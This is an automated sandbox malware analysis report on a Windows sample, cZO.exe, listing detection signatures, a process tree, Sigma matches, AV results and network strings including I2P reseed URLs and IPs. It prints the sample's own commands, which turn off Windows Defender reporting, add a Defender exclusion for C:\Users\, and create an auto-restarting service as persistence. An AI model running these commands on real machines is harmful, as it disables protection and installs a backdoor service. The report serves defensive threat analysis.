Windows Analysis Report
cZO.exe

Overview

General Information

Sample name: cZO.exe
Analysis ID: 1584500
MD5: be6e88537235ff3b6b61de70dfeecb3b
SHA1: 4a622aa9cbbb7f66484734b85a211f20e0cb0edd
SHA256: bc1a44614123c841e31835919a21ed7322ea6537f6652f36d24fd7f83a440294
Tags: exe, I2Parcae, user-aachum
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (creates a PE file in dynamic memory)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Connects to many ports of the same IP (likely port scanning)
Contains functionality to hide user accounts
Found Tor onion address
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Modifies Windows Defender protection settings
NDIS Filter Driver detected (likely used to intercept and sniff network traffic)
Performs DNS queries to domains with low reputation
Sigma detected: Execution from Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious New Service Creation
Sigma detected: Suspicious Program Location with Network Connections
Uses TOR for connection hiding
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Connects to several IPs in different countries
Contains functionality to call native functions
Contains functionality to create new users
Contains functionality to dynamically determine API calls
Contains functionality to enumerate network shares
Contains functionality to enumerate running services
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query network adapter information
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes

Classification

  • System is w10x64
  • cZO.exe (PID: 7128 cmdline: "C:\Users\user\Desktop\cZO.exe" MD5: BE6E88537235FF3B6B61DE70DFEECB3B)
  • cZO.exe (PID: 5660 cmdline: C:\Users\user\Desktop\cZO.exe MD5: BE6E88537235FF3B6B61DE70DFEECB3B)
    • cmd.exe (PID: 6536 cmdline: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\7h14dhb9g32w177ypoi9wje.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7088 cmdline: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 6472 cmdline: powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 432 cmdline: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • shdpeqdz2a54sj46ur0.exe (PID: 7088 cmdline: "C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe" MD5: 2F829F1CB631D234C54F2E6C6F72EB57)
      • taskkill.exe (PID: 3652 cmdline: taskkill.exe /F /FI "SERVICES eq RDP-Controller" MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • conhost.exe (PID: 3920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 4324 cmdline: sc.exe stop RDP-Controller MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 1532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • main.exe (PID: 6524 cmdline: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe MD5: BB070CFBD23A7BC6F2A0F8F6D167D207)
          • WerFault.exe (PID: 5688 cmdline: C:\Windows\system32\WerFault.exe -u -p 6524 -s 1236 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
      • sc.exe (PID: 6448 cmdline: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 4676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 5880 cmdline: sc.exe failure RDP-Controller reset= 1 actions= restart/10000 MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 6428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 1716 cmdline: sc.exe start RDP-Controller MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 6616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • icacls.exe (PID: 5308 cmdline: icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18 MD5: 48C87E3B3003A2413D6399EA77707F5D)
        • conhost.exe (PID: 5452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • icacls.exe (PID: 5492 cmdline: icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\npX5adYEH7eu.acl MD5: 48C87E3B3003A2413D6399EA77707F5D)
        • conhost.exe (PID: 5568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 5548 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 4324 cmdline: C:\Windows\system32\WerFault.exe -pss -s 432 -p 6524 -ip 6524 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 4124 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • main.exe (PID: 3688 cmdline: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe MD5: BB070CFBD23A7BC6F2A0F8F6D167D207)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, CommandLine: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, NewProcessName: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, OriginalFileName: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, ParentCommandLine: sc.exe stop RDP-Controller, ParentImage: C:\Windows\System32\sc.exe, ParentProcessId: 4324, ParentProcessName: sc.exe, ProcessCommandLine: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, ProcessId: 6524, ProcessName: main.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\7h14dhb9g32w177ypoi9wje.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6536, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", ProcessId: 7088, ProcessName: powershell.exe
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe, ParentProcessId: 7088, ParentProcessName: shdpeqdz2a54sj46ur0.exe, ProcessCommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, ProcessId: 6448, ProcessName: sc.exe
Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 95.216.2.172, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, Initiated: true, ProcessId: 6524, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49856
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'", CommandLine: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\7h14dhb9g32w177ypoi9wje.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6536, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'", ProcessId: 432, ProcessName: powershell.exe
Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe, ParentProcessId: 7088, ParentProcessName: shdpeqdz2a54sj46ur0.exe, ProcessCommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, ProcessId: 6448, ProcessName: sc.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\7h14dhb9g32w177ypoi9wje.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6536, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", ProcessId: 7088, ProcessName: powershell.exe
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 5548, ProcessName: svchost.exe
No Suricata rule has matched

AV Detection

Source: https://reseed.diva.exchange/b.c, Avira URL Cloud: Label: malware
Source: https://reseed.i2pgit.org/i2pseeds.su3, Avira URL Cloud: Label: malware
Source: https://reseed.i2pgit.org:443/i2pseeds.su3, Avira URL Cloud: Label: malware
Source: https://login.live, Avira URL Cloud: Label: malware
Source: https://reseed.i2pgit.org/P#, Avira URL Cloud: Label: malware
Source: https://reseed.diva.exchange/, Avira URL Cloud: Label: malware
Source: https://reseed.i2pgit.org/, Avira URL Cloud: Label: malware
Source: https://reseed2.i2p.net/, Avira URL Cloud: Label: malware
Source: https://reseed.i2pgit.org/i2pseeds.su30, Avira URL Cloud: Label: malware
Source: https://netdb.i2p2.no/, Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exe, Avira: detection malicious, Label: TR/AVI.Agent.jibab
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll, ReversingLabs: Detection: 26%
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll, ReversingLabs: Detection: 31%
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, ReversingLabs: Detection: 69%
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dll, ReversingLabs: Detection: 69%
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe, ReversingLabs: Detection: 69%
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exe, ReversingLabs: Detection: 57%
Source: C:\Windows\Temp\I77yQ5in, ReversingLabs: Detection: 26%
Source: C:\Windows\Temp\YXkdIYk6, ReversingLabs: Detection: 69%
Source: C:\Windows\Temp\YkhL6reh, ReversingLabs: Detection: 31%
Source: cZO.exe, Virustotal: Detection: 19%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe, Joe Sandbox ML: detected

Compliance

Source: C:\Users\user\Desktop\cZO.exe, Unpacked PE file: 0.2.cZO.exe.2510000.1.unpack
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe, File created: C:\Users\user\AppData\Local\Temp\installer.log
Source: Binary string: RfxVmt.pdb source: shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000016.00000003.2453846580.000002234F1D7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp, GEGgzh0s.22.dr, update.pkg.11.dr
Source: Binary string: RfxVmt.pdbGCTL source: shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000016.00000003.2453846580.000002234F1D7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp, GEGgzh0s.22.dr, update.pkg.11.dr
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8B915387F NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,22_2_00007FF8B915387F
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8B91538C3 LocalAlloc,wcsncpy,LookupAccountNameW,GetLastError,GetLastError,LocalAlloc,LookupAccountNameW,LocalFree,GetLastError,ConvertSidToStringSidA,GetLastError,wcslen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,22_2_00007FF8B91538C3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FF8B915387F NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,32_2_00007FF8B915387F
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FF8B91538C3 LocalAlloc,wcsncpy,LookupAccountNameW,GetLastError,GetLastError,LocalAlloc,LookupAccountNameW,LocalFree,GetLastError,ConvertSidToStringSidA,GetLastError,wcslen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,32_2_00007FF8B91538C3
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exeCode function: 6_2_00007FF775723DB3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,6_2_00007FF775723DB3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF6BE031CF3 FindNextFileA,_mbscpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF6BE031CF3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8B9156233 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8B9156233
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8B918B333 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8B918B333
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BA4F4013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8BA4F4013
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BFB331F3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8BFB331F3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BFB55013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8BFB55013
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BFB857B3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8BFB857B3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FF8B9156233 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,32_2_00007FF8B9156233
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FF8B918B333 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,32_2_00007FF8B918B333
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FF8BA504013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,32_2_00007FF8BA504013
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FF8BFB331F3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,32_2_00007FF8BFB331F3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FF8BFB55013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,32_2_00007FF8BFB55013
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FF8BFB857B3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,32_2_00007FF8BFB857B3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]22_2_00007FF6BE03737B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]22_2_00007FF8B915A13B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]22_2_00007FF8B9187DFB
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]22_2_00007FF8BA4F967B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]22_2_00007FF8BFB39BBB
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]22_2_00007FF8BFB5A67B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]22_2_00007FF8BFB8293B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]32_2_00007FF8B915A13B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]32_2_00007FF8B9187DFB
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]32_2_00007FF8BA50967B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]32_2_00007FF8BFB39BBB
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]32_2_00007FF8BFB5A67B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]32_2_00007FF8BFB8293B

Networking

Source: global traffic, TCP traffic: 95.158.36.98 ports 0,1,2,30125,3,5
Source: global traffic, TCP traffic: 107.189.28.6 ports 1,2,5,6,9,12596
Source: global traffic, TCP traffic: 69.10.220.235 ports 19348,1,3,4,8,9
Source: global traffic, TCP traffic: 78.191.208.199 ports 0,1,2,3,9,13920
Source: shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exeString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,ht
Source: main.exe, 00000016.00000002.3155678668.00000223502E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.onion.im/
Source: main.exe, 00000016.00000003.2471613149.00000223502F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.onion.im/
Source: main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exe, 00000016.00000002.3155678668.000002235025D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exe, 00000016.00000002.3157806335.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exe, 00000020.00000002.3261726260.00000270D3CED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.onion.im/
Source: main.exe, 00000020.00000002.3262201152.00000270D4100000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.onion.im/i2pseeds.su3
Source: main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
